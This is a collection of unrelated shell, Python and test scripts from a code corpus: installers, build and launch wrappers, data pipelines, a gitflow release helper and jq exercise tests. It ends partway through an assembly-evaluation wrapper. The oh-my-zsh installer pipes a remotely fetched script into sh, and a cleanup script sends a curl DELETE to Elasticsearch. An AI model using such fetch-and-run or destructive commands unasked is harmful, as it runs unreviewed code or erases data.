            shutil.copyfile(file, dstfile)
            print("{" + dstfile + "} Copy Done")
        else:
            print("source file is not exit")
def Run(argv=[]):
    """Parse command-line options and dispatch to Copy.

    Options: -s/--source <dir>, -d/--destnation <dir>,
    -o/--OverWrite <True|False>.
    """
    _len = len(argv)
    if _len == 0:
        print("Empty Input .....")
        return
    optlist = ""
    remind = ""
    try:
        # Fixed: getopt long-option names must be given WITHOUT the leading
        # "--" (the original passed '--source=' etc., so the long forms
        # never matched and raised GetoptError instead).
        optlist, remind = (getopt.getopt(argv, "s:d:o:", [
            'source=',
            'destnation=',
            'OverWrite=',
        ]))
        print(optlist, remind)
    except getopt.GetoptError:
        print("Argument Error ... ")
        print("*.py -s sourcePath -d destnation -o True")
        # Fixed: bail out instead of falling through with bogus state.
        return
    isOverWrite = True
    destnation = ""
    source = ""
    for opt, arg in optlist:
        if opt in ("-o", "--OverWrite"):
            if arg == 'False' or arg == 'false':
                isOverWrite = False
        elif opt in ("-d", "--destnation"):
            destnation = arg
        # Fixed: "--souce" typo meant the long source option was ignored.
        elif opt in ("-s", "--source"):
            source = arg
    if len(destnation) == 0 or len(source) == 0:
        print("Enpty destnation or source path")
        return
    Copy(source, destnation, isOverWrite)
if __name__=="__main__":
    print("Move File Script")
    # Leftover manual-testing scaffolding; only Run(sys.argv[1:]) is live.
    path = "/home/zz/workstation"
    # Traver(path=path, suffiexs=".md")
    # print(sys.argv[0], sys.argv[1], sys.argv[2])
    # Copy(src=path, dst="./", suffiexs=".md")
    # NOTE(review): this shadows the builtin `str` and is unused — example
    # invocation kept for reference only.
    str = "FileMove.py -s /home/zz/blog/source/_posts/ -d /home/zz/workstation/sort/markdown/ -o true"
    _argv = []
    Run(sys.argv[1:])
| true |
802e4c606947d756abcb3330805e5af7c8bbca03 | Shell | vantage-org/pg | /plugins/pg/run.sh | UTF-8 | 310 | 2.96875 | 3 | [
"MIT"
] | permissive | #!/bin/sh
# ---
# image:
#   tag: "$VG_PG_TAG:$VG_PG_VERSION"
#   network: $VG_DOCKER_NETWORK
#   environment:
#     - VG_PG_TAG=postgres
#     - VG_PG_VERSION=latest
#     - VG_DOCKER_NETWORK=vg_pg
# ---
# With an argument: run it as a one-off SQL command; otherwise open an
# interactive psql session. DATABASE_URL must be set in the environment.
if [ -n "$1" ] ; then
    psql --dbname "$DATABASE_URL" --command "$1"
else
    psql --dbname "$DATABASE_URL"
fi
| true |
bbaf96201297cad6d2934b7a9551631861050286 | Shell | gitoso/toso-arch-linux | /chroot-install.sh | UTF-8 | 2,692 | 3 | 3 | [
"MIT"
] | permissive | # === Import Env Variables ===
# Runs inside the arch-chroot; consumes variables exported by the outer
# installer via /environment (KEYBOARD_LAYOUT, u_HOSTNAME, u_USERNAME,
# cpu_type, gpu_type, use_efi, grub_disk, install_gui).
source /environment
rm /environment
# Time Zone
ln -sf /usr/share/zoneinfo/Brazil/East /etc/localtime
hwclock --systohc
# Localization
sed -i "s/#en_US.UTF-8/en_US.UTF-8/g" /etc/locale.gen
locale-gen
echo "LANG=en_US.UTF-8" >> /etc/locale.conf
echo "KEYMAP=$KEYBOARD_LAYOUT" >> /etc/vconsole.conf
# /etc/hostname
echo "$u_HOSTNAME" >> /etc/hostname
# /etc/hosts
echo "127.0.0.1	localhost" >> /etc/hosts
echo "::1		localhost" >> /etc/hosts
echo "127.0.1.1	$u_HOSTNAME.localdomain	$u_HOSTNAME" >> /etc/hosts
# NetworkManager
pacman -S --noconfirm networkmanager nm-connection-editor network-manager-applet
systemctl enable NetworkManager.service
systemctl start NetworkManager.service
# Initramfs
mkinitcpio -P
# Root Password
echo "----------------"
echo "Password for ROOT"
passwd
# Micro-code
if [ "$cpu_type" == "intel" ]
then
	pacman -S --noconfirm intel-ucode
elif [ "$cpu_type" == "amd" ]
then
	pacman -S --noconfirm amd-ucode
fi
# Boot Loader (GRUB)
if [ "$use_efi" == "true" ]
then
	pacman -S --noconfirm grub efibootmgr os-prober ntfs-3g
	grub-install --target=x86_64-efi --efi-directory=/efi --bootloader-id=GRUB
	grub-mkconfig -o /boot/grub/grub.cfg
else
	pacman -S --noconfirm grub os-prober ntfs-3g
	grub-install --target=i386-pc $grub_disk
	grub-mkconfig -o /boot/grub/grub.cfg
fi
# User management
useradd -m -G adm,ftp,games,http,log,rfkill,sys,systemd-journal,uucp,wheel,lp $u_USERNAME
echo "----------------"
echo "Password for user $u_USERNAME"
passwd $u_USERNAME
# Enable multilib
# The sed pair uncomments the [multilib] section header and its Include line.
sed -i '/#\[multilib\]/{N;s/\n#/\n/;P;D}' /etc/pacman.conf
sed -i "s/#\[multilib\]/\[multilib\]/g" /etc/pacman.conf
# Driver install
if [ "$gpu_type" == "intel" ]
then
	pacman -Sy --noconfirm xf86-video-intel mesa lib32-mesa vulkan-intel lib32-vulkan-intel intel-media-driver libva-intel-driver
elif [ "$gpu_type" == "amd" ]
then
	pacman -Sy --noconfirm xf86-video-amdgpu mesa lib32-mesa vulkan-radeon lib32-vulkan-radeon libva-mesa-driver lib32-libva-mesa-driver mesa-vdpau lib32-mesa-vdpau
# NOTE(review): "nivida" looks like a typo for "nvidia", but the comparison
# value must match what the outer installer writes into /environment —
# confirm before changing either side.
elif [ "$gpu_type" == "nivida" ]
then
	pacman -Sy --noconfirm xf86-video-nouveau mesa lib32-mesa
fi
# Sudo install & config
pacman -S --noconfirm sudo
echo "$u_USERNAME ALL=(ALL) ALL" >> /etc/sudoers
# Utilities install
pacman -S --noconfirm vim git
# Install Basic GUI (XOrg + i3-gaps)
if [ "$install_gui" == "true" ]
then
	pacman -S --noconfirm xorg xorg-xinit i3 dmenu xdg-user-dirs
	cp .xinitrc /home/$u_USERNAME/.xinitrc
	chown $u_USERNAME /home/$u_USERNAME/.xinitrc
	chgrp $u_USERNAME /home/$u_USERNAME/.xinitrc
fi
# End installation
exit
2eee1bca8b9970ec6209f06a639c4aeef502b320 | Shell | ricardograca/gedit-themes | /install | UTF-8 | 3,028 | 4.09375 | 4 | [] | no_license | #!/bin/bash
#
# Copyright (C) 2012 Ricardo Graça
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# Notes:
#
# - This script was only tested on:
# - Ubuntu 12.04 with Gedit 3.4
# - Ubuntu 16.04 with Gedit 3.18.3
# - Red Hat Enterprise Linux 6.7 with 2.28.4
# but it should work in other linux distros as well.
# default install dirs: LOCAL (in home dir) && NEW (3.x version)
# LOCAL/LATEST act as booleans (1/0) toggled by the -a and -o flags below.
LOCAL=1
LATEST=1
INSTALL_DIR_LOCAL_LATEST="$HOME/.local/share/gtksourceview-3.0/styles"
INSTALL_DIR_GLOBAL_LATEST="/usr/share/gtksourceview-3.0/styles"
INSTALL_DIR_LOCAL_2X="$HOME/.gnome2/gedit/styles"
INSTALL_DIR_GLOBAL_2X="/usr/share/gtksourceview-2.0/styles"
INSTALL_DIR="" # set in evaldir
# Print usage instructions of the script
# (heredoc content is the user-visible help text; do not reflow it).
function usage {
cat << EOF
usage: $0 [options]
This script installs the bundled theme styles for gedit.
OPTIONS:
   -h      Shows this message
   -a      Install for all users
   -o      Old version support (Gedit 2.x version)
EOF
}
# Ensure $INSTALL_DIR exists, creating it when missing (with sudo for
# system-wide locations under /usr). Returns non-zero when creation fails.
function chkdir {
  [ -d "$INSTALL_DIR" ] && return 0
  if [[ $INSTALL_DIR = /usr/* ]]; then
    sudo mkdir -p "$INSTALL_DIR" || return 1
  else
    mkdir -p "$INSTALL_DIR" || return 1
  fi
  return 0
}
# Copy every *.xml theme file from the current directory into $INSTALL_DIR,
# escalating with sudo for system-wide destinations under /usr.
function cpfiles {
  if [[ $INSTALL_DIR = /usr/* ]]; then
    sudo cp *.xml "$INSTALL_DIR" && return 0
    return 1
  fi
  cp *.xml "$INSTALL_DIR" && return 0
  return 1
}
# Resolve INSTALL_DIR from the LOCAL (per-user vs system-wide) and LATEST
# (gtksourceview 3.x vs Gedit 2.x) flags.
function evaldir {
  local scope=global ver=latest
  (( LOCAL == 1 )) && scope=local
  (( LATEST == 1 )) || ver=2x
  case "$scope:$ver" in
    local:latest)  INSTALL_DIR="$INSTALL_DIR_LOCAL_LATEST" ;;
    local:2x)      INSTALL_DIR="$INSTALL_DIR_LOCAL_2X" ;;
    global:latest) INSTALL_DIR="$INSTALL_DIR_GLOBAL_LATEST" ;;
    global:2x)     INSTALL_DIR="$INSTALL_DIR_GLOBAL_2X" ;;
  esac
}
# Loop through passed arguments
while getopts "hao" OPTION; do
	case $OPTION in
		h)
			usage
			exit 1
			;;
		a)
			# System-wide install (all users).
			LOCAL=0
			;;
		o)
			# Target the Gedit 2.x style directories.
			LATEST=0
			;;
	esac
done
# Pick the destination, create it, then copy the theme files into it.
evaldir
echo -e "Installing Gedit themes to $INSTALL_DIR\n..."
chkdir
SUCCESS=$?
if [ $SUCCESS -eq 0 ]; then
	cpfiles
	if [ $? -eq 0 ]; then
		echo -e "...\nAll done!\n:)"
		exit 0
	else
		echo -e "Unable to copy themes to $INSTALL_DIR\n:("
		exit 1
	fi
else
	echo -e "The destination directory $INSTALL_DIR doesn't exist and I can't create it either!\n:("
	exit 1
fi
| true |
e0c8376091e1d5bc0f354405d7f8dafb3be9cbbf | Shell | glennj/exercism.io | /jq/vehicle-purchase/test-vehicle-purchase.bats | UTF-8 | 2,915 | 2.515625 | 3 | [] | no_license | #!/usr/bin/env bats
# Bats test suite for the jq "vehicle-purchase" exercise; run/assert helpers
# come from the bats-extra support library.
load bats-extra
# --- task 1: needs_license -------------------------------------------------
@test requires_a_license_for_a_car {
    ## task 1
    run jq -R 'include "vehicle-purchase"; needs_license' <<< 'car'
    assert_success
    assert_output "true"
}
@test requires_a_license_for_a_truck {
    ## task 1
    run jq -R 'include "vehicle-purchase"; needs_license' <<< 'truck'
    assert_success
    assert_output "true"
}
@test does_not_require_a_license_for_a_bike {
    ## task 1
    run jq -R 'include "vehicle-purchase"; needs_license' <<< 'bike'
    assert_success
    assert_output "false"
}
@test does_not_require_a_license_for_a_stroller {
    ## task 1
    run jq -R 'include "vehicle-purchase"; needs_license' <<< 'stroller'
    assert_success
    assert_output "false"
}
@test does_not_require_a_license_for_an_e-scooter {
    ## task 1
    run jq -R 'include "vehicle-purchase"; needs_license' <<< 'e-scooter'
    assert_success
    assert_output "false"
}
# --- task 2: choose_vehicle (heredocs feed one JSON pair per line) ---------
@test correctly_recommends_the_first_option {
    ## task 2
    run jq -r 'include "vehicle-purchase"; choose_vehicle' << END_INPUT
["Bugatti Veyron", "Ford Pinto"]
["Chery EQ", "Kia Niro Elektro"]
END_INPUT
    assert_success
    assert_line --index 0 'Bugatti Veyron is clearly the better choice.'
    assert_line --index 1 'Chery EQ is clearly the better choice.'
}
@test correctly_recommends_the_second_option {
    ## task 2
    run jq -r 'include "vehicle-purchase"; choose_vehicle' << END_INPUT
["Ford Pinto", "Bugatti Veyron"]
["2020 Gazelle Medeo", "2018 Bergamont City"]
END_INPUT
    assert_success
    assert_line --index 0 'Bugatti Veyron is clearly the better choice.'
    assert_line --index 1 '2018 Bergamont City is clearly the better choice.'
}
# --- task 3: resell_price (age brackets <3, 3-10, >10) ---------------------
@test price_is_reduced_to_80%_for_age_below_3 {
    ## task 3
    run jq 'include "vehicle-purchase"; resell_price' << END_INPUT
{"original_price": 40000, "age": 2}
{"original_price": 40000, "age": 2.5}
END_INPUT
    assert_success
    assert_line --index 0 '32000'
    assert_line --index 1 '32000'
}
@test price_is_reduced_to_50%_for_age_above_10 {
    ## task 3
    run jq 'include "vehicle-purchase"; resell_price' << END_INPUT
{"original_price": 40000, "age": 12}
END_INPUT
    assert_success
    assert_output '20000'
}
@test price_is_reduced_to_70%_for_between_3_and_10 {
    ## task 3
    run jq 'include "vehicle-purchase"; resell_price' << END_INPUT
{"original_price": 25000, "age": 7}
END_INPUT
    assert_success
    assert_output '17500'
}
@test works_correctly_for_threshold_age_3 {
    ## task 3
    run jq 'include "vehicle-purchase"; resell_price' << END_INPUT
{"original_price": 40000, "age": 3}
END_INPUT
    assert_success
    assert_output '28000'
}
@test works_correctly_for_threshold_age_10 {
    ## task 3
    run jq 'include "vehicle-purchase"; resell_price' << END_INPUT
{"original_price": 25000, "age": 10}
END_INPUT
    assert_success
    assert_output '17500'
}
| true |
4a977bca6befd93ac1c3e7f068cc326aebd907d5 | Shell | vuminhkh/tosca-runtime | /cli/src/main/resources/bin/tosca-runtime.sh | UTF-8 | 433 | 2.8125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# Resolve the directory containing this script and the product base dir.
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
BASE_DIR="$(dirname "$SCRIPT_DIR")"
echo "Setting tosca runtime base dir to ${BASE_DIR}"
# JVM options; caller-supplied TOSCA_RUNTIME_OPTS are appended last so they
# can override the defaults.
TOSCA_RUNTIME_OPTS="-Xms512M -Xmx1536M -Xss1M -XX:+CMSClassUnloadingEnabled -Dtoscaruntime.clientMode=true -Dtoscaruntime.basedir=${BASE_DIR} ${TOSCA_RUNTIME_OPTS}"
# Launch sbt with the packaged launch configuration, forwarding all args.
java ${TOSCA_RUNTIME_OPTS} -jar $SCRIPT_DIR/sbt-launch.jar "@${BASE_DIR}/conf/launchConfig" "$@"
1292085de1d643bc357df4f887d636115056eaf6 | Shell | mephraim/dotfiles-etc | /installers/install-oh-my-zsh.sh | UTF-8 | 377 | 3.046875 | 3 | [] | no_license | #!/bin/sh
# Install oh-my-zsh and the powerlevel9k theme, skipping each step when it
# is already present under $HOME.
install_oh_my_zsh() {
  # Fixed: the guard previously checked "$HOME/.oh-my-sh/" (typo), so the
  # network installer re-ran on every invocation even when oh-my-zsh was
  # already installed.
  if [ ! -d "$HOME/.oh-my-zsh/" ]; then
    sh -c "$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)"
  fi
  if [ ! -d "$HOME/.oh-my-zsh/custom/themes/powerlevel9k/" ]; then
    git clone https://github.com/bhilburn/powerlevel9k.git ~/.oh-my-zsh/custom/themes/powerlevel9k
  fi
}
install_oh_my_zsh
| true |
002e5cd76d9a4f42dd0c773a6a32af7fad553a08 | Shell | kb1vc/WSPRLog | /scripts/FilterFiles.sh | UTF-8 | 1,604 | 3.34375 | 3 | [
"BSD-3-Clause"
] | permissive | #!/bin/bash -v
# Pipeline: split a WSPR log into per-band CSVs, drop reports from stations
# that look like multi-receiver setups, then regenerate the filtered splits
# and analysis products (R input, odds-ratio by solar hour, histograms).
# $1: input log file, $2: output basename. Runs with -v (verbose trace).
# some are prolific two-receiver stations
fname=$1
basename=$2
# split the file into logs
WSPRLogSplitter --igz on ${fname} ${basename}
for bf in ${basename}_*.csv
do
    rfn=`basename ${bf} .csv`
    echo "processing ${bf}"
    WSPRLogBandFilter --flo 0.0 --fhi 100e9  ${bf} ${rfn}_img_tmp.csv
    # figure out which calls should be removed.
    # make a temporary band split file
    WSPRLogLineFilter ${rfn}_img_tmp.csv ${rfn}_img_tmp
    # gather the calls that are likely to be multi-reporters
    CallRR ${bf} ${rfn}_img_tmp_D.csv ${rfn}_callrr.rpt
    # Lines flagged 'H' mark the suspect receiver callsigns (column 2).
    grep '^H' rx_${rfn}_callrr.rpt | awk '{ print $2; }' | sort > ${rfn}_exclude_calls.lis
    # now remove the possible problem RX stations
    grep -v -f ${rfn}_exclude_calls.lis ${rfn}_img_tmp.csv > ${rfn}_img.csv
    grep -v -f ${rfn}_exclude_calls.lis ${bf} > ${rfn}_clean.csv
    # remove the junk files
    rm ${rfn}_img_tmp.csv [rt]x_${rfn}_callrr.rpt ${rfn}_img_tmp_*.csv
    # now generate the splits with problematic calls removed
    WSPRLogBandFilter --flo 0.0 --fhi 100e9 ${rfn}_clean.csv ${rfn}_img.csv
    # generate the R input file
    WSPRLog2R ${rfn}_clean.csv ${rfn}_R.csv
    WSPRLogLineFilter ${rfn}_img.csv ${rfn}_img
    #
    for bif in ${rfn}_img_D.csv
    do
        echo "  ${bif}"
        hfbn=`basename ${bif} .csv`
        # calculate the relative risk for exception reports by solar hour
        WSPRLogSolTimeOR ${rfn}_clean.csv ${bif} ${hfbn}_sol_time_or.dat
        WSPRLogHisto ${bif} ${hfbn}_FD.hist --field FREQ_DIFF
        WSPRLogXY ${bif} ${hfbn}_DIST_FD.xydat --x_field FREQ_DIFF --y_field DIST
    done
done
| true |
5311a1120d420650b34b0d840dd3098c40b56348 | Shell | roamlab/HWasP-toy-problem | /activate_env.sh | UTF-8 | 254 | 2.59375 | 3 | [] | no_license | # This file needs to be at the root of project dir
# Meant to be sourced: PROJECTDIR becomes the directory containing this
# file (which must sit at the repo root).
export PROJECTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
# NOTE(review): this replaces any existing PYTHONPATH instead of appending.
export PYTHONPATH=${PROJECTDIR}
source ${PROJECTDIR}/venv_mass_spring/bin/activate
echo "Mass-spring toy problem environment ready."
| true |
055eac1c3118f053b2ea692e3f91fa96dda8e105 | Shell | adamiprinciples/gitflow-semver | /git-release-bash | UTF-8 | 1,873 | 4.21875 | 4 | [
"MIT"
] | permissive | #!/bin/bash
# Validate the sub-command; everything else below assumes one of these.
if [ "$1" != 'major' -a "$1" != 'minor' -a "$1" != 'patch' -a "$1" != 'init' -a "$1" != 'version' ]; then
    >&2 echo "Usage: git release major|minor|patch|init|version"
    exit 1
fi
# 'version' prints this tool's own version and exits.
if [ "$1" == 'version' ]; then
    echo "0.2.0"
    exit 0
fi
# Refuse to release when master has diverged from origin.
if [ `git rev-parse master` != `git rev-parse origin/master 2> /dev/null` ]; then
    >&2 echo "Error: master is out of date with origin, please update/push first!"
    exit 1
fi
# Latest tag reachable from master is the last released version.
lastVersion=`git describe --abbrev=0 master 2> /dev/null`
if [ $? != 0 ]; then
    if [ "$1" == 'init' ]; then
        read -p "No tags found in repo, shall we initialize this repo for gitflow? [Y/n] " -n 1 -r
        echo
        if echo $REPLY | grep -E '^[Nn]$' > /dev/null; then
            exit 1
        else
            git flow init
            lastVersion="0.0.0"
        fi
    else
        >&2 echo "Error: no tags found in repo, run again with 'init' to initialize for gitflow"
        exit 1
    fi
elif [ `git rev-parse develop` != `git rev-parse origin/develop 2> /dev/null` ]; then
    >&2 echo "Error: develop is out of date with origin, please update/push first!"
    exit 1
fi
# Split "X.Y.Z" into its semver components (intentional word splitting).
versionArray=(${lastVersion//./ })
major=${versionArray[0]}
minor=${versionArray[1]}
patch=${versionArray[2]}
# Bump the component selected by the sub-command.
if [ "$1" == 'major' ]; then
    newVersion="$((major+1)).0.0"
elif [ "$1" == 'minor' ]; then
    newVersion="$major.$((minor+1)).0"
elif [ "$1" == 'patch' ]; then
    newVersion="$major.$minor.$((patch+1))"
elif [ "$1" == 'init' ]; then
    newVersion="0.1.0"
fi
echo "Last release was version ${lastVersion}."
echo "We're about to create a new $1 release, with version ${newVersion}."
read -p "Continue? [Y/n] " -n 1 -r
echo
if echo $REPLY | grep -E '^[Nn]$' > /dev/null; then
    exit 1
else
    # Patches become gitflow hotfixes; everything else is a release branch.
    if [ "$1" == 'patch' ]; then
        git flow hotfix start $newVersion
    else
        git flow release start $newVersion
        # 'init' finishes immediately so the repo gets its first tag.
        if [ "$1" == 'init' ]; then
            git flow release finish $newVersion
        fi
    fi
fi
| true |
6292d58bf29949b96f6d06c7c211ea8ed8d9c656 | Shell | Julio0ctavio/DevOps_Dojo_Julio | /Containers/Kubernetes/K8S-training/guestbook/commands.bash | UTF-8 | 1,333 | 2.6875 | 3 | [] | no_license | # Part I
## Create frontend deployment
kubectl create -f part-i/frontend-deployment.yaml
## Get Pod Name & Port-Forwarding
kubectl port-forward $(kubectl get pods -l app=guestbook,tier=frontend -o jsonpath="{.items[0].metadata.name}") 3000:3000 &
curl 127.0.0.1:3000
## Acces via browser to 127.0.0.1:3000
## Create backend deployment
kubectl create -f part-i/redis-master-deployment.yaml
kubectl create -f part-i/redis-slave-deployment.yaml
# Part II
## Create backend services
kubectl create -f part-ii/redis-master-service.yaml
kubectl create -f part-ii/redis-slave-service.yaml
## Create frontend services
kubectl create -f part-ii/frontend-service.yaml
## Get NODE_PORT and access frontend
curl $(minikube ip):$(kubectl get svc frontend -o jsonpath="{.spec.ports[0].nodePort}")
## Acces via browser to:
echo "$(minikube ip):$(kubectl get svc frontend -o jsonpath="{.spec.ports[0].nodePort}")"
# Part III
## Remove old frontend service
kubectl delete svc frontend
## Create frontend service
kubectl create -f part-iii/frontend-service.yaml
kubectl create -f part-iii/ingress.yaml
## Edit hosts
## Windows Users: https://blog.kowalczyk.info/article/10c/local-dns-modifications-on-windows-etchosts-equivalent.html
echo "$(minikube ip) guestbook-site.com" | sudo tee -a /etc/hosts
## Acces via browser to guestbook-site.com | true |
fa275b506144e90dc52465e288bec109ebb62e25 | Shell | MASILab/thorax_non_rigid_toolbox | /run_scripts/local_scripts/20200202_run_registration_atlas2folder.sh | UTF-8 | 1,864 | 3.3125 | 3 | [] | no_license | #!/bin/bash
##################################################
# 2/2/2020 - Kaiwen
# Build pipeline for thorax non-rigid registration.
##################################################
#bash_config_file=$(readlink -f $1)
#in_folder=$(readlink -f $2)
#reg_folder=$(readlink -f $3)
# Paths are currently hard-coded to the author's environment; the config
# file supplies OUT_ROOT, REG_TOOL_ROOT and PYTHON_ENV.
SRC_ROOT=/home/local/VANDERBILT/xuk9/03-Projects/03-Thorax-FL/src/ThoraxNonRigid
bash_config_file=${SRC_ROOT}/bash_config/20200202_non_rigid_deeds_image2image_label.sh
echo "Non-rigid pipeline, from atlas to images"
echo "Loading bash config from ${bash_config_file}"
source ${bash_config_file}
target_image_folder=${OUT_ROOT}/preprocess_1
atlas_image=${OUT_ROOT}/atlas/atlas_iso.nii.gz
#atlas_image=${OUT_ROOT}/reference.nii.gz
#atlas_label=${OUT_ROOT}/atlas/labels_iso.nii.gz
echo
echo "Target image ${target_image_folder}"
echo "Atlas image ${atlas_image}"
echo "Atlas label ${atlas_label}"
echo
omat_folder=${OUT_ROOT}/omat
#reg_folder=${OUT_ROOT}/reg_reference2image
#reg_folder=${OUT_ROOT}/reg_reference2image_5
reg_folder=${OUT_ROOT}/reg_image2atlas_1
mkdir -p ${omat_folder}
mkdir -p ${reg_folder}
# Register every preprocessed image to the atlas via deedsBCV, timing each.
for file_path in "$target_image_folder"/*
do
    start=`date +%s`
    file_base_name="$(basename -- $file_path)"
    out_file_path=${reg_folder}/${file_base_name}
    # Note the swap below: each subject image is used as --fixed and the
    # atlas as --moving (image-to-atlas direction).
    fixed_img=${atlas_image}
    moving_img=${file_path}
    out_img=${out_file_path}
    omat_txt=${omat_folder}/${file_base_name}
    reg_tool_root=${REG_TOOL_ROOT}
    reg_method=deformable_deedsBCV_paral
    reg_args="\"-l_1_-G_16_-L_16_-Q_5\""
    label=${atlas_label}
    # xtrace only around the long-running call so the log shows the exact
    # command line used.
    set -o xtrace
    ${PYTHON_ENV} ${SRC_ROOT}/tools/reg_thorax.py --fixed ${moving_img} --moving ${fixed_img} --out ${out_img} --omat ${omat_txt} --reg_tool_root ${reg_tool_root} --reg_method ${reg_method} --reg_args ${reg_args} --label ${label}
    set +o xtrace
    end=`date +%s`
    runtime=$((end-start))
    echo "Complete! Total ${runtime} (s)"
done
| true |
c5b9dc2c8d68075a0f752cc19881005c55118616 | Shell | Yettimania/dotfiles | /.config/sxiv/exec/key-handler | UTF-8 | 690 | 3.921875 | 4 | [] | no_license | #!/usr/bin/env sh
# sxiv key-handler: sxiv invokes this with the pressed key as $1 and writes
# the selected image path(s) on stdin, one per line.
# ^X-^R: prompt for new image name (needs `dmenu`) and `mv`
# ^X-^C: copy the image path to X clipboard (needs `xclip`)
# Example zenity prompt:
# name="$(zenity --entry --display=:0.0 --text "rename $file to")" 2> /dev/null
while read -r file
do
    case "$1" in
    "C-r")
        name="$(dmenu -p "rename $file to: ")" 2> /dev/null
        # Only rename when the user actually typed something.
        if ! [ -z "$name" ]; then
            mv "$file" "$name"
        fi
        ;;
    "C-c")
        printf "%s" "$file" | xclip -selection clipboard ;;
    *)
        printf "Sorry, I don't understand"
        exit 1
        ;;
    esac
done
| true |
9491b38953cbf759b7d87f508552f2c7cc0105ea | Shell | TommoCrabb/Telly-Wangler | /timestamp.bash | UTF-8 | 139 | 3.078125 | 3 | [] | no_license | #!/usr/bin/env bash
# Print a sortable timestamp (YYYY-MMDD-HHMMSS); when an argument is given,
# emit "<argument>_<timestamp>" instead.
stamp="$(date +%Y-%m%d-%H%M%S)"
if [[ -n "${1}" ]] ; then
    printf '%s_%s\n' "${1}" "${stamp}"
else
    printf '%s\n' "${stamp}"
fi
| true |
e738ee9f80d9fa1b01e7e0866099224ff4f2a8ba | Shell | oslab-ewha/memwork | /Simulator/SCM/simulation.sh | UTF-8 | 613 | 2.71875 | 3 | [] | no_license |
# Make the SCM simulator and trace tools reachable on PATH.
export PATH=$PATH:/home/jskim/work/src/github.com/jskim072/Simulator/SCM
export PATH=$PATH:/home/jskim/work/src/github.com/jskim072/Simulator/SCM/trace
# $1: workload .log file; the stripped basename is kept for reference.
filename=`basename $1 .log`
#filename2=$(unknown).log
#FIU_parser -o trace/$filename2 -f $1 >> /dev/null 2>&1 &
# Parse the FIU trace and start the simulator, both in the background; the
# sleeps give each stage time to produce its output files.
trace/FIU_parser -o test.txt -f $1 >> /dev/null 2>&1 &
sleep 5
./SCM &
sleep 5
# Live X11 plot of the access classes; the gnuplot loop replots every second.
gnuplot -persist << PLOT
set terminal x11
set xlabel "Virtual time"
set ylabel "Logical block address"
plot "other.txt" lt rgb "green" title "OTHERS","seq.txt" lt rgb "red" title "SEQ","loop.txt" lt rgb "blue" title "LOOP"
while(1) {
	replot
	pause 1
}
PLOT
| true |
96b9f6927cd6faefd7272cfdd95213d213988a4a | Shell | hysds/mozart | /scripts/clean_failed_jobs.sh | UTF-8 | 310 | 2.75 | 3 | [
"LicenseRef-scancode-proprietary-license",
"Apache-2.0"
] | permissive | #!/bin/bash
# Delete all failed-job documents from the Mozart Elasticsearch index.
# Resolve the directory containing this script, then the package root.
BASE_PATH=$(dirname "${BASH_SOURCE}")
BASE_PATH=$(cd "${BASE_PATH}"; pwd)
PACKAGE_DIR=$(cd "${BASE_PATH}/.."; pwd)
CONF_FILE_SETTINGS="${PACKAGE_DIR}/settings.cfg"
# Pull the double-quoted ES_URL value out of settings.cfg. Quoted so a path
# with spaces cannot word-split; $() replaces the legacy backticks.
ES_URL=$(grep '^ES_URL' "${CONF_FILE_SETTINGS}" | cut -d'"' -f 2)
# Guard: an empty ES_URL would otherwise issue the DELETE against a relative
# URL instead of the configured Elasticsearch host.
if [ -z "${ES_URL}" ]; then
    echo "ES_URL not found in ${CONF_FILE_SETTINGS}" >&2
    exit 1
fi
curl -XDELETE "${ES_URL}/job_status/job/_query?q=status:job-failed"
| true |
65ea799bdf871de5e57991b028a4913cad20aaa6 | Shell | JohnUrban/sciara-project-tools | /slurmgear/evalwrapper/run-evalwrapper.sh | UTF-8 | 9,075 | 2.875 | 3 | [] | no_license | #!/bin/bash
# Assembly-evaluation wrapper: configures site-specific paths/options for a
# battery of evaluation pipelines (short-read, BioNano, long-read, BLAST vs
# transcripts/peptides/known seqs, RNA-seq, BUSCO v3), optionally
# renames/length-filters the input assemblies, then launches each pipeline
# from its own sub-directory. All paths are cluster-specific; edit before use.
# NOTE(review): no `set -e` -- a failed `cd` would launch the next pipeline in
# the wrong directory; variables are expanded unquoted throughout, so paths
# must not contain whitespace. Confirm before reusing outside this cluster.
## Input Assemblies FOFN
ASMFOFN=input.fofn
CLEANALL=true
## GETTING ABS PATH OF ASMFOFN
ASMFOFN=`readlink -f $ASMFOFN`
RENAME=true
## MIN CONTIG SIZE -- defaults to analyzing all (minlen=0).
MINLEN=0
##TODO:
## ADD OPTION: make all sequences uppercase
################### SHORT READ ###########################
# specify paths to lap read sample (LR1,LR2) and all reads (R1,R2)-- give dummy answers if will not be using (that will serve as place-holders)
LR1=/users/jurban/data/scratch/lap/sample-1.5m/downsampled.1.fastq
LR2=/users/jurban/data/scratch/lap/sample-1.5m/downsampled.2.fastq
R1=~/data/scratch/male-ilmn/data/ilmnraw/R1.fastq
R2=~/data/scratch/male-ilmn/data/ilmnraw/R2.fastq
## OPTIONS for what programs to use.
## FILL IN ==>"EvalThese"<== BELOW WITH ONE OF THESE
ALL=eval.cfg
ALLDIRTY=eval.noclean.cfg
OnlyAle=eval.aleonly.cfg
OnlyBusco=eval.buscoOnly.cfg
OnlyLap=eval.laponly.cfg
OnlyReapr=eval.reapronly.cfg
OnlyReaprNoClean=eval.reapronly.noclean.cfg
OnlyReaprNoCleanAggressive=eval.reapronly.noclean.aggressive.cfg
OnlyPilon=pilon.eval.cfg
AleModule=alemodule.eval.cfg ## builds bt2, maps reads, runs ale
## FILL IN WITH CORRECT VARIABLE
EvalThese=$ALL
## May need to adjust the following
SHORTSCRIPTS=/gpfs_home/jurban/software/sciaratools/sciara-project-tools/slurmgear/shortreadeval/scripts/
SHORTAUTO=${SHORTSCRIPTS}/auto-shortreadeval.sh
# NOTE(review): SHORTEVAL is set but never used below -- TODO confirm.
SHORTEVAL=${SHORTSCRIPTS}/eval.ARGS.sh
SHORTCONFIG=${SHORTSCRIPTS}/configs/${EvalThese}
